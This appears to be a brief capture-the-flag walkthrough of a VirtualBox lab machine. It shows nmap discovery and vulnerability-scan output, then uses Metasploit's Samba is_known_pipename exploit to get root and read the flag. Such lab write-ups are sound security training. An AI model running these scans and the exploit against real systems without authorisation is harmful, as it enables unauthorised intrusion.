Lets find out the IP first with nmap
nmap 192.168.18.0/24
The IP is 192.168.18.85
.
Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.
root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:thekelleys:dnsmasq:2.75:
| CVE-2019-14513 5.0 https://vulners.com/cve/CVE-2019-14513
|_ CVE-2019-14834 4.3 https://vulners.com/cve/CVE-2019-14834
80/tcp open http PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.18.85
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.
samba is running on port 139. Lets try to exploit it before going to ftp.
msfconsole
msf5 > msf5 > use exploit/linux/samba/is_known_pipename
Now set the options
Time to run the exploit. Enter run
We got the root. Now lets read the flag.
cat /root/flag.txt
Finished! Thats all for today.